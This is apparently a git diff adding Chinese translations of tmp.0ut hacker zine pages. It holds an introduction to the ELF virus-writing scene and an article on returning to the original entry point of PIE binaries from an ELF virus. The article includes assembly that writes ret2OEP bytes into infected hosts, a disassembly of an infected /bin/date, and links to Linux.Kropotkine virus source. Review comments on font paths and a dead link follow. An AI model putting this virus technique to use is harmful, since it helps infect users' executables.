65 changes: 65 additions & 0 deletions 1/zh/0.html
@@ -0,0 +1,65 @@
<html>
<head>
<title>tmp.0ut</title>
<meta charset="utf-8">
<style>
body {
color: #FEFEFE;
background-color: #0c0d10;
margin: 0 auto;
padding: 1em 0 1em 0;
}
@font-face { font-family: "gohu"; src: url("../gohu.woff") format('woff'); }
pre { font-family: "gohu", "Lucida Console", monospace, Monaco; font-size: 14px; line-height: 1.0; }
a { color: #93ffd7; text-decoration: none; }
</style>
</head>
<body>
<center><div style="display: inline-block; text-align: left;"><pre>
┌───────────────────────┐
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │
│ █ █ █ █ █ █ │
│ █ █ █ █ █▀▀▀▀ │
│ █ █ █ █ ▄ │
│ ▄▄▄▄▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄ ▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄▄▄▄▄ │
│ █ │
介绍: │ █ │
~ tmp.0ut 团队: └───────────────────█ ──┘

我等这一刻已经等了很久了。

说实话,我认为很多ELF爱好者都没有想到这一天真的会到来。传统上,我们这些ELF研究者
一直都是局外人。即使在VLAD和90年代末的病毒场景之后,在silvio发表第一篇论文之后,
在unix病毒邮件列表、phrack文章和elfmaster之后,我们的人数和聚集地依然很少且分散。

六个月前,我认识了s01den,我们决定一起进行一些ELF项目。我邀请了我的老朋友TMZ。
一个月后,我们可能有5个人。然后变成了10个。15个。在三个月内,Discord聊天室里已经
有28个人,所有人都在讨论ELF和项目,并准备发布一份杂志 - 这一切发生得太快,我甚至
很难描述它是如何形成的。

我们开始交谈、召开会议和开展项目 - 并且都同意记录我们的旅程将是一个绝妙的主意;
创建一系列可以用来学习的出版物,作为参考指南,也许最终可以将它们组合成一本关于
ELF修改技术和技术的流畅卷册,供下一代ELF爱好者使用。我可以相当确定地说,这很可能
是有史以来最大的一群黑客同时聚在一起,且都在积极从事ELF项目。

带有代码示例的感染算法。具有全新内存加载ELF二进制文件方法的自定义链接器脚本。
二进制高尔夫。从远程源加载内核模块。用Python编写的消毒程序。与传奇人物的访谈。
对迄今为止所见过的最复杂的Linux病毒之一进行39页的重新逆向工程和分析。我写了很多
页想要放入这个等待了20年才写的介绍中的内容,但现在当真正要写的时候,我觉得这些
内容中的大部分应该被省略,或者放在自己的文章中,因为我们令人惊叹的团队和内容本身
就能说明一切。

现在,不再多说,tmp.out、Thugcrowd和Symbolcrash制作组自豪地呈现Mental 'elf
support group(精神'ELF'支持小组)- 由卫生shellcode协会和二进制匪徒后门工厂流浪汉
赞助

~ sblip
</pre></div></center></body></html>
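Review bot: the @font-face src in this file, url("../gohu.woff"), resolves to 1/gohu.woff, but 1/zh/11.html in this same change (same directory, same template) uses url("../../gohu.woff"), which resolves one level higher. Only one of the two paths can be right; in the file with the wrong one the browser will silently fall back to the next font in the pre rule ("Lucida Console", monospace). Pick the path that matches where gohu.woff actually lives and use it in both files.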
295 changes: 295 additions & 0 deletions 1/zh/1.html

Binary file added 1/zh/10/10.1.png
Binary file added 1/zh/10/10.10.png
Binary file added 1/zh/10/10.11.png
Binary file added 1/zh/10/10.12.png
Binary file added 1/zh/10/10.13.png
Binary file added 1/zh/10/10.14.png
Binary file added 1/zh/10/10.15.png
Binary file added 1/zh/10/10.16.png
Binary file added 1/zh/10/10.17.png
Binary file added 1/zh/10/10.18.png
Binary file added 1/zh/10/10.19.png
Binary file added 1/zh/10/10.2.png
Binary file added 1/zh/10/10.20.png
Binary file added 1/zh/10/10.21.png
Binary file added 1/zh/10/10.22.png
Binary file added 1/zh/10/10.23.png
Binary file added 1/zh/10/10.24.png
Binary file added 1/zh/10/10.25.png
Binary file added 1/zh/10/10.26.png
Binary file added 1/zh/10/10.27.png
Binary file added 1/zh/10/10.28.png
Binary file added 1/zh/10/10.29.png
Binary file added 1/zh/10/10.3.png
Binary file added 1/zh/10/10.30.png
Binary file added 1/zh/10/10.4.png
Binary file added 1/zh/10/10.5.png
Binary file added 1/zh/10/10.6.png
Binary file added 1/zh/10/10.7.png
Binary file added 1/zh/10/10.8.png
Binary file added 1/zh/10/10.9.png
300 changes: 300 additions & 0 deletions 1/zh/10/index.html

148 changes: 148 additions & 0 deletions 1/zh/11.html
@@ -0,0 +1,148 @@
<html>
<head>
<title>tmp.0ut</title>
<meta charset="utf-8">
<style>
body {
color: #FEFEFE;
background-color: #0c0d10;
margin: 0 auto;
padding: 1em 0 1em 0;
}
@font-face { font-family: "gohu"; src: url("../../gohu.woff") format('woff'); }
pre { font-family: "gohu", "Lucida Console", monospace, Monaco; font-size: 14px; line-height: 1.0; }
a { color: #93ffd7; text-decoration: none; }
</style>
</head>
<body>
<center><div style="display: inline-block; text-align: left;"><pre>
┌───────────────────────┐
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ │
│ █ █ █ █ █ █ │
│ █ █ █ █ █▀▀▀▀ │
│ █ █ █ █ ▄ │
│ ▄▄▄▄▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄ ▄ │
│ █ █ │
│ █ █ │
│ █▄▄▄█ │
│ ▄▄▄▄▄ │
│ █ │
在启用PIE的情况下返回原始入口点 │ █ │
~ S01den └───────────────────█ ──┘

由tmp.out团队的S01den倾情编写!

--- 1) 引言 ---

当我刚开始接触病毒世界时,我最初遇到的困难之一就是如何正确地返回宿主程序的原始入口点。
这是每个称职的病毒都必须具备的核心功能,在过去实现起来非常简单(mov ebx, OEP ; jmp ebx)。

你可能会问:"为什么现在不那么容易了?"

答案只有三个字母:PIE,即位置无关可执行文件(Position Independent Executable)。在
这种二进制文件中,指令的地址在每次执行时都会被随机化(尽管有对齐要求)。因此OEP
不再是一个常量,我们现在必须先计算它才能跳转过去。

让我们来看看该如何做!

--- 2) 在启用PIE的情况下返回OEP ---

我将在这里描述我在Lin64.Kropotkine[0]中用于计算Ret2OEP的方法。
我当时卡了几天,直到看到Elfmaster的一篇论文[1]让我豁然开朗。

以下是代码:

-------------------------------- CUT-HERE ------------------------------------------
mov rcx, r15 ;r15保存了我们的病毒代码存储的地址(在栈中)
add rcx, VXSIZE ; rcx现在包含病毒代码之后的第一个地址
mov dword [rcx], 0xffffeee8 ; 相对调用get_eip(在13字节之前)
mov dword [rcx+4], 0x0d2d48ff ; sub rax, (VXSIZE+5)
mov byte [rcx+8], 0x00000005
mov word [rcx+11], 0x0002d48
mov qword [rcx+13], r9 ; sub rax, entry0
mov word [rcx+17], 0x0000548
mov qword [rcx+19], r12 ; add rax, sym._start
mov dword [rcx+23], 0xfff4894c ; mov rsp, r14
mov word [rcx+27], 0x00e0 ; jmp rax
------------------------------------------------------------------------------------

如你所见,我们逐字节将返回OEP的代码直接写入内存(在病毒代码之后,这样当之前的病毒代码
执行完成后我们就可以跳转到这个例程)。这些字节将被写入宿主程序以进行感染。我们想要
得到这样的结果:

(这段代码来自我用Lin64.Kropotkine感染的/bin/date)

-------------------------------- CUT-HERE ------------------------------------------
; 病毒代码的结尾:
get_rip:
0x0c01ada3 488b0424 mov rax, qword [rsp]
0x0c01ada7 c3 ret
getdot:
0x0c01ada8 e842fbffff call 0xc01a8ef ; 调用main
0x0c01adad 2e0000 add byte cs:[rax], al ; '.'
; &lt;---- 病毒代码结束,我们想在这里注入我们的ret2OEP代码!
; 我们想要在这里得到的代码:
0x0c01adb0 e8eeffffff call 0xc01ada3 ; 调用get_rip &lt;--
0x0c01adb5 482d0d050000 sub rax, 0x50d ; sub rax, (VXSIZE+5)
0x0c01adbb 482da8a8010c sub rax, entry0
0x0c01adc1 4805b0380000 add rax, 0x38b0 ; add rax, sym._start
0x0c01adc7 4c89f4 mov rsp, r14 ; 恢复原始栈
0x0c01adca ffe0 jmp rax
------------------------------------------------------------------------------------

基本上,计算OEP的思路并不复杂。
假设宿主程序原始代码的第一条指令的偏移量(即非随机化的OEP)是0x38b0,并且当我们调用
get_rip时(上面代码中的0x0c01adb0)RIP当前是0x55556156edb5(一个随机化的地址)。
我们需要知道OEP的随机化地址才能跳转到它。

好的,调用get_rip将RIP放入RAX,我们首先需要从RAX(0x55556156edb5)中减去病毒的大小
(加上5,即call get_rip指令的大小)才能得到病毒代码开始的随机化地址:

---&gt; 0x55556156edb5 - (0x508 + 5) = 0x55556156e8a8 ; 病毒代码第一条指令的地址

现在,我们用这个值减去新的入口点,即病毒代码开始的非随机化地址(在病毒执行之前计算得到,
在我们的例子中是0xc01a8a8)。

实际上我们只是简单地做了这个:

---&gt; 随机化的新入口点 - 非随机化的新入口点 (e_hdr.entry)

用我们的值计算如下:

---&gt; 0x55556156e8a8 - 0xc01a8a8 = 0x555555554000

我们进行这个减法是为了提取随机化的"基址"。有了这个值,我们只需要将它加上原始的
e_hdr.entry(非随机化的OEP):

---&gt; 0x555555554000 + 0x38b0 = 0x5555555578b0

你就得到了一个可以跳转的正确地址!
所以jmp rax将开始执行宿主程序的原始代码!

--- 结论 ---
总结一下,我们只是做了这样的事:

---&gt; get_rip() - (VX_SIZE + 5) - new_EP + original-e_hdr.entry

如你所见,就是简单的数学运算!;)
病毒场景万岁!
哪里有权威,哪里就没有自由。
一切为了所有人。
永远向前!

--- 注释和参考文献 ---
[0] https://github.com/vxunderground/MalwareSourceCode
/blob/main/VXUG/Linux.Kropotkine.asm
[1] 现代ELF感染SCOP二进制文件的技术:
https://bitlackeys.org/papers/pocorgtfo20.pdf
- 特别是名为"Note on resolving Elf_Hdr-&gt;e_entry
in PIEexecutables"的部分

--- 源代码 ---

- <a href="../Linux.Kropotkine.asm">Linux.Kropotkine.asm</a>
</pre></div></center></body></html>
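Review bot: the source link at the end of the page, &lt;a href="../Linux.Kropotkine.asm"&gt;, points one directory above 1/zh/, and this change adds no file at that path; either confirm that 1/Linux.Kropotkine.asm already exists in the tree or point the link at the vxunderground URL already given in reference [0], so the translated page does not ship with a dead link. Also, in the section name quoted under reference [1], "PIEexecutables" is missing a space ("PIE executables").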